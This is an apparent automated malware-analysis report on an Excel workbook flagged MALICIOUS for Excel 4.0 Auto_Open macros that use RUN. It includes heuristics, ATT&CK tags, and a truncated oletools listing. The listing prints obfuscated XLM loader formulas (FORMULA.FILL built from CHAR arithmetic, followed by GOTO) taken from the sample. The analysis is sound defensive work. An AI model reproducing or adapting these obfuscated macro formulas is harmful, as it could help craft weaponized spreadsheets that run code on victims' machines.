MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is configured to use dangerous functions like RUN. This strongly suggests the macro is designed to execute a secondary payload. The specific dangerous functions identified are RUN and a formula API, pointing towards an attempt to achieve arbitrary code execution.
Heuristics (3)

- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126953 bytes |

SHA-256 of xlm_macros.txt: 962dcb4eecb3f1998335870a460cf7053244881cc7cbcb53be7bdbfc6235396c
Preview script (first 1,000 lines of the extracted script)

```text
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet
' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!BS10827
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Sheet,DG61,"",2623.00000000000000000000
' Sheet,FE160,"",-422.00000000000000000000
' Sheet,M161,"",-518.00000000000000000000
' Sheet,JU185,"",2622.00000000000000000000
' Sheet,GW290,"",-0.01929133858267716509
' Sheet,GO345,"",-1.48000122070312500888
' Sheet,BD352,"",1.24324324324324320123
' Sheet,HB355,"",0.55445544554455450381
' Sheet,JT413,"",-0.74324324324324320123
' Sheet,JO491,"",1.56140350877192979340
' Sheet,L493,"",-489.00000000000000000000
' Sheet,IS526,"",-518.00000000000000000000
' Sheet,DE542,"",-30.00000000000000000000
' Sheet,JM561,"",-298.00000000000000000000
' Sheet,DL590,"",0.14754098360655737432
' Sheet,JJ595,"",3.29629629629629627985
' Sheet,EG621,"",8.60000488281250063949
' Sheet,DM661,"",34.00000000000000000000
' Sheet,CK666,"",2.52500122070312515987
' Sheet,II668,"",0.68561872909698995393
' Sheet,BL704,"",-336.00000000000000000000
' Sheet,GO726,"",97.00000000000000000000
' Sheet,BL759,"",-13.20000000000000284217
' Sheet,FC767,"",69.00000000000000000000
' Sheet,B825,"",314.00000000000000000000
' Sheet,HH873,"",-2624.00000000000000000000
' Sheet,D902,"",329.00000000000000000000
' Sheet,IH990,"",-2601.00000000000000000000
' Sheet,GW1053,"",-4.71739130434782616419
' Sheet,DB1088,"",0.64301075268817198261
' Sheet,BI1107,"",265.00000000000000000000
' Sheet,EV1133,"",-1.73148148148148139924
' Sheet,JI1193,"",-977.00000000000000000000
' Sheet,EP1211,"",-125.12500000000000000000
' Sheet,DW1254,"",1.50000000000000000000
' Sheet,FJ1262,"",-1.35661764705882359472
' Sheet,HP1342,"",-1278.50000000000000000000
' Sheet,IG1368,"",0.19069767441860466239
' Sheet,EN1378,"",1031.00000000000000000000
' Sheet,HM1392,"",-30.97560975609756184213
' Sheet,BD1442,"",274.00000000000000000000
' Sheet,EO1457,"",-3.70940170940170954594
' Sheet,IU1507,"",31.00000000000000000000
' Sheet,BG1515,"",0.47524752475247522554
' Sheet,JI1529,"",-0.95945945945945942945
' Sheet,HD1541,"FORMULA.FILL(CHAR(EX35387-FF53317)&CHAR(CF59051*Q24460)&CHAR(JQ54801/BZ57161)&CHAR(EA50740-IF29556)&CHAR(CB64210+IA34879)&CHAR(EX35387-BK32238)&CHAR(JQ54801+BI19828)&CHAR(EX35387-BG2296)&CHAR(CB64210*EO34709)&CHAR(ER1140-X15298)&CHAR(JB33290/JB23647)&CHAR(IA52677/EC44210)&CHAR(CF59051*FI31932)&CHAR(ER1140*DZ54168)&CHAR(JB33290*JN24321)&CHAR(JB33290*JL53146)&CHAR(IA52677/IU46702)&CHAR(EA50740*CA9896)&CHAR(CB64210*HQ65406)&CHAR(FU27276/IH24629)&CHAR(CB64210/GG25697)&CHAR(JT43484+W25719)&CHAR(CF59051+IK53977)&CHAR(EX35387/B29872)&CHAR(ER1140-ER26461)&CHAR(IA52677/GN28599)&CHAR(JT43484-HB47632)&CHAR(CB64210-FC57443)&CHAR(JT43484+CB38387)&CHAR(IA52677/GQ9630)&CHAR(ER1140*BC33106)&CHAR(ER1140-EG2317)&CHAR(IA52677/JP50962)&CHAR(JB33290/JR59952)&CHAR(JT43484/CN21792)&CHAR(JB33290+HI41825),BX55816)",""
' Sheet,HD1542,GOTO(EY44141),""
' Sheet,EU1564,"FORMULA.FILL(CHAR(ER1140*BU4981)&CHAR(JB33290*FA31385)&CHAR(IA52677+A32328)&CHAR(ER1140+EN54927)&CHAR(EX35387/JU32357)&CHAR(JQ54801*CI63102)&CHAR(FU27276/BF39391)&CHAR(EX35387-EP13116)&CHAR(EA50740-IV31248)&CHAR(EX35387/BI29103)&CHAR(CB64210+P18315)&CHAR(CB64210-CE27071)&CHAR(EX35387-JL20433)&CHAR(JQ54801+HU56579)&CHAR(IA52677-BD1442)&CHAR(EA50740/EH50338)&CHAR(IA52677-DV14029)&CHAR(FU27276+DY62523)&CHAR(CB64210-IP22152)&CHAR(IA52677-A42386)&CHAR(ER1140/M27755)&CHAR(JB33290+FM7404)&CHAR(FU27276+U52045)&CHAR(IA52677+GK46475),HV53012)",""
' Sheet,EU1565,GOTO(GG2583),""
' Sheet,BL1589,"",213.00000000000000000000
' Sheet,FC1612,"",2.14457831325301206959
' Sheet,EW1629,"",-0.16322314049586778006
' Sheet,EN1654,"",0.67326732673267331020
' Sheet,GG1675,"",-0.07834101382488478649
' Sheet,GD1698," ... (truncated)
```